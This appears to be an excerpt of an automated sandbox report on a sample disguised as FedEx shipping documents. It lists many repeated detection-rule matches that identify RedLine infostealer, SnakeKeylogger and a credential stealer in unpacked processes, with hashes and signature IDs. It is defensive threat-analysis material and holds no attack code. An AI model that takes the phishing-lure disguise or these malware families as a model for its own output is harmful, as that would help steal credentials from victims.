        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1446686847.000000000077D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1435295037.000000007EE86000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1435849334.000000007EE10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1500822415.0000000021686000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1446686847.000000000074E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: 12.2.hzwdvhxM.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 12.2.hzwdvhxM.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 0.2.FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe.2189b7a8.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 7.2.hzwdvhxM.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 12.2.hzwdvhxM.pif.438038.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 12.1.hzwdvhxM.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 14.2.hzwdvhxM.pif.438038.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 12.2.hzwdvhxM.pif.25c20000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 12.2.hzwdvhxM.pif.25c20000.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.hzwdvhxM.pif.25c20000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 7.2.hzwdvhxM.pif.294202f6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 7.2.hzwdvhxM.pif.294202f6.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 7.2.hzwdvhxM.pif.294202f6.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 7.2.hzwdvhxM.pif.438038.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 12.2.hzwdvhxM.pif.287d0000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 12.2.hzwdvhxM.pif.287d0000.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.hzwdvhxM.pif.287d0000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 12.1.hzwdvhxM.pif.4da6c8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 14.1.hzwdvhxM.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 14.2.hzwdvhxM.pif.2d540000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 14.2.hzwdvhxM.pif.2d540000.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.hzwdvhxM.pif.2d540000.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 7.1.hzwdvhxM.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 14.1.hzwdvhxM.pif.4da6c8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 14.2.hzwdvhxM.pif.2a601216.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 14.2.hzwdvhxM.pif.2a601216.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.hzwdvhxM.pif.2a601216.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 7.2.hzwdvhxM.pif.2c440000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 7.2.hzwdvhxM.pif.2c440000.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 7.2.hzwdvhxM.pif.2c440000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 12.2.hzwdvhxM.pif.25c20000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 12.2.hzwdvhxM.pif.25c20000.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.hzwdvhxM.pif.25c20000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 12.2.hzwdvhxM.pif.259d1216.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 12.2.hzwdvhxM.pif.259d1216.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.hzwdvhxM.pif.259d1216.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 11.2.Mxhvdwzh.PIF.215fa548.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 14.3.hzwdvhxM.pif.28abccf0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 14.3.hzwdvhxM.pif.28abccf0.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.3.hzwdvhxM.pif.28abccf0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 12.2.hzwdvhxM.pif.287d0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 12.2.hzwdvhxM.pif.287d0000.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.hzwdvhxM.pif.287d0000.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 14.2.hzwdvhxM.pif.2a601216.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 14.2.hzwdvhxM.pif.2a601216.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.hzwdvhxM.pif.2a601216.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 14.2.hzwdvhxM.pif.2a6002f6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 14.2.hzwdvhxM.pif.2a6002f6.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.hzwdvhxM.pif.2a6002f6.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 12.2.hzwdvhxM.pif.25c20f20.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 12.2.hzwdvhxM.pif.25c20f20.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.hzwdvhxM.pif.25c20f20.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 14.2.hzwdvhxM.pif.4da6c8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 7.3.hzwdvhxM.pif.2792f7f8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 7.3.hzwdvhxM.pif.2792f7f8.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 7.3.hzwdvhxM.pif.2792f7f8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 0.2.FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe.21686db8.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 12.1.hzwdvhxM.pif.438038.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
